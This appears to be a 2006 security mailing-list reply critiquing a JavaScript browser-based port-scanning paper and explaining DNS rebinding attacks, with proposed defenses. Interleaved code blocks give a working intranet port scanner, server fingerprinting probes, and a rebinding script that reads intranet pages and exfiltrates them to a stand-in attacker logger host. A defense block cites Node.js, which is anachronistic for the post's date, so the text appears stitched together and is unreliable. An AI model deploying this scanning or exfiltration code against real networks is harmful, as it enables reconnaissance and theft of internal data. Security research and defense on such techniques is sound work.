Amit Klein (AKsecurity)
aksecurity at hotpop.com
Fri Jul 28 12:43:28 EDT 2006
On 27 Jul 2006 at 11:47, Billy Hoffman wrote:
> SPI Labs has discovered a technique to scan a network, fingerprint all the web-enabled devices
> it finds, and send attacks or commands to those devices. This technique can scan networks
> protected behind firewalls such as corporate networks. All the code to do this is written in
> JavaScript and can execute in nearly any web browser on nearly any platform when a user
> simply opens a malicious web page; it requires only JavaScript
> support in the browser. The code can be part of a Cross Site Scripting (XSS) attack payload,
> increasing the damage XSS can do.
> SPI has published a whitepaper about this technique and has also released proof of concept code
> that will portscan a given range of IPs and fingerprint Microsoft IIS and Apache boxes.
> Whitepaper: http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html
> Proof of Concept: http://www.spidynamics.com/spilabs/js-port-scan/
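The announced technique can be sketched roughly like this (a minimal, hypothetical rendition of timing-based scanning from JavaScript, not SPI's actual code; the helper names are made up):

```javascript
// Build the list of candidate addresses to probe.
// expandRange("10.0.0", 1, 3) -> ["10.0.0.1", "10.0.0.2", "10.0.0.3"]
function expandRange(prefix, from, to) {
  var ips = [];
  for (var i = from; i <= to; i++) {
    ips.push(prefix + "." + i);
  }
  return ips;
}

// In a browser, each candidate is probed by pointing an Image at it and
// racing load/error against a timeout: a quick load/error event usually
// means something answered on the port (an HTTP server returning
// non-image content fires onerror fast), while reaching the timeout
// suggests the port is closed or filtered.
function probe(host, port, timeoutMs, report) {
  var done = false;
  var img = new Image();
  var timer = setTimeout(function () {
    if (!done) { done = true; report(host, port, "closed/filtered"); }
  }, timeoutMs);
  img.onload = img.onerror = function () {
    if (!done) { done = true; clearTimeout(timer); report(host, port, "open"); }
  };
  img.src = "http://" + host + ":" + port + "/";
}

// Usage (browser only):
// expandRange("10.0.0", 1, 254).forEach(function (ip) {
//   probe(ip, 80, 1000, function (h, p, state) { console.log(h, p, state); });
// });
```

The timing thresholds and the open/closed interpretation vary per browser and network, which is part of what the whitepaper works through.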
This is definitely a good paper, and I really liked the basic technique
(scanning/fingerprinting). Here are a few comments:
1. In the overview, you state "SPI Labs has discovered a technique to scan a network,
fingerprint all the Web-enabled devices found, and send attacks or commands to those devices."
As far as I can tell, the fingerprinting part is indeed new (quite likely that the scanning
part is too, though I didn't run a full check). As for the idea that
you can attack 3rd party sites via JS, I don't think it's new. For example, I mentioned
this concept very briefly in my 2004 text on HTTP Response Splitting, and I'm pretty sure I
didn't invent it. Here's an excerpt from my text
(http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf, p. 21):
This principle can be extended into attacking other inaccessible targets using an
intermediate entity (usually client/browser). For example, consider an organization that
has an internal forward proxy cache server. Such a cache server can be a target to a
web cache poisoning attack by having the client originate the attack. This can be
achieved if the attacker causes the client to download some HTML page and/or [...]
2. You mention "Increased Danger from Cross Site Scripting [...] This means any XSS
vulnerability on any site can be used to attack the end user, regardless of the
features of the vulnerable site."
In my understanding, the increased danger comes only from permanent (stored) XSS (as
opposed to reflected and DOM-based XSS). For reflected/DOM-based XSS, the link you
send to the user could very well be a link to the malicious site, so having reflected/
DOM-based XSS adds nothing to the attack surface (well, there's the bit of social
engineering - you could claim that a user is more likely to click on a link to a known
site than to an unknown one).
3. In the recommendation part, you focus more on XSS prevention, but I think that
there are some measures that can reduce the fingerprinting vector, at least as described in
your text. For example, if the webmaster removes ALL default files from the web server
virtual root, then it seems to me that the fingerprinting technique for the web server
itself will fail. I'm not saying it's impossible to devise methods that will somehow
fingerprint the web server even without the default files (e.g. if it's possible in
different webservers to force them into an infinite loop, in various server-specific URLs,
or if a different return status can be forced - 200 vs. 4xx/5xx by crafting URLs in certain
ways), but it's worth mentioning (though probably not applicable to HTTP-enabled devices
or to web applications).
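To make the point concrete, the default-file fingerprinting vector looks roughly like this (a hypothetical sketch, not SPI's code; Apache really does ship /icons/apache_pb.gif in a default install, while the IIS path here is illustrative):

```javascript
// Hypothetical fingerprint table: each server type is identified by a
// file that ships with its default install. Removing all default files,
// as suggested above, makes every one of these probes fail.
var FINGERPRINTS = [
  { server: "Apache", path: "/icons/apache_pb.gif" },
  { server: "IIS",    path: "/pagerror.gif" }
];

function probeUrl(host, path) {
  return "http://" + host + path;
}

// In a browser: an Image that fires onload proves the default image is
// present, identifying the server; onerror is inconclusive.
function fingerprint(host, report) {
  FINGERPRINTS.forEach(function (fp) {
    var img = new Image();
    img.onload = function () { report(host, fp.server); };
    img.onerror = function () { /* probe says nothing */ };
    img.src = probeUrl(host, fp.path);
  });
}
```

Which is exactly why this particular check dies once the default files are gone, while the more exotic behavioral tricks (forced infinite loops, status-code differences) would survive.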
4. Allow me to start a thread(?) about an issue that arises from the paper: is server
fingerprinting an attack? Or, in other words, is the ability to know which server we're
dealing with a vulnerability? My opinion is that it isn't practically an
attack/vulnerability. For example, most CGI scanners would probably barrage the target with
all exploits for all web-servers. The fact that the server is identified as Apache (or IIS,
or whatever) won't help the attacker, because he/she will throw in all attacks anyway.
In any case, hiding the server type is security by obscurity, and it's unlikely for someone
to really succeed in doing so, due to error messages, HTTP-level fingerprinting,
application level telltale signs (__VIEWSTATE...), etc.
I am NOT saying fingerprinting abilities are not important. I think the results of the
paper are beautiful, and may also indicate a kind of problem we haven't foreseen. I'd also
like to use this opportunity to point the readers at a very interesting (yet somehow
little known/discussed) text which
describes a client side attack that enables the attacker to send requests and read (!) data
from 3rd party HTTP servers (note: not HTTPS). Without further ado, please read "DNS:
Spoofing and Pinning" by Mohammad A. Haque (http://viper.haque.net/~timeless/blog/11/).
This text dates September 12th, 2003 or earlier (see the Bugzilla entry it references).
The idea is simple (yet perhaps not too practical):
a. Victim (browser) goes to URL http://www.evil.site/hackme.html
a1 Victim's DNS client resolves www.evil.site (through dns.evil.site...) to (say)
100.200.300.400 (OK, no such IP, for demonstration purposes only).
a2 Victim gets data from the malicious server on 100.200.300.400 - this is an HTML page
a3 The browser CACHES this page.
b. Victim browses elsewhere, then shuts down the browser and goes to sleep (!!! - the
browser must be shut down due to the DNS pinning feature of modern browsers; otherwise this
would have been much more practical).
c. Victim wakes up the next day.
d. Victim goes to URL http://www.evil.site/hackme.html
d1 The browser uses the cached page
d2 The cached page's script requests http://www.evil.site/very/sensitive/page.html
d3 The victim's DNS client resolves www.evil.site (through dns.evil.site...) to (say)
10.1.2.3 (Intranet address!!!).
d4 The Intranet server serves back the desired page
d5 The browser enables the cached http://www.evil.site/hackme.html page to access this
page because they're on the same domain. So the old http://www.evil.site/hackme.html page
can read the data from the retrieved http://www.evil.site/very/sensitive/page.html.
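Concretely, the script inside the cached hackme.html page might look something like this (a hypothetical sketch; the logger host name is made up):

```javascript
// Runs inside the cached http://www.evil.site/hackme.html page. After
// the DNS switch, www.evil.site resolves to the intranet server, yet
// the browser still treats it as the same origin, so responseText from
// the intranet server is readable.
function exfilUrl(logger, data) {
  return logger + "?d=" + encodeURIComponent(data);
}

function stealPage(path) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", path, true); // same host name => same origin, read allowed
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4) {
      // Ship the intranet content out, e.g. as an image beacon.
      new Image().src = exfilUrl("http://attacker-logger.example/log",
                                 xhr.responseText);
    }
  };
  xhr.send(null);
}

// stealPage("/very/sensitive/page.html");
```

Note this only works for plain HTTP: with HTTPS the certificate for www.evil.site wouldn't match the intranet server.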
BTW - a possible solution to this anti-DNS-pinning attack (mentioned in the bugzilla
reference above) - enforce only known Host headers at the server. Or maybe move to SSL?
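The Host-header defense is simple to sketch, e.g. as a Node.js request handler (a hypothetical illustration; the host names are made up, and Apache/IIS have equivalent virtual-host configuration to do the same thing):

```javascript
// Known identities of this server; anything else (e.g. www.evil.site
// pointed at us via anti-DNS-pinning) gets rejected even though the
// TCP connection legitimately reached this box.
var KNOWN_HOSTS = ["intranet.example.com", "10.1.2.3"];

function hostAllowed(hostHeader) {
  if (!hostHeader) return false;
  var name = hostHeader.split(":")[0].toLowerCase(); // drop any :port suffix
  return KNOWN_HOSTS.indexOf(name) !== -1;
}

// Request handler enforcing the check; wire it up with
// require("http").createServer(handler).listen(8080) on Node.js.
function handler(req, res) {
  if (!hostAllowed(req.headers.host)) {
    res.writeHead(400, { "Content-Type": "text/plain" });
    res.end("Unknown Host header\n");
    return;
  }
  res.writeHead(200, { "Content-Type": "text/plain" });
  res.end("hello\n");
}
```

With this in place, the cached evil page's request arrives with "Host: www.evil.site" and gets a 400 instead of the sensitive content.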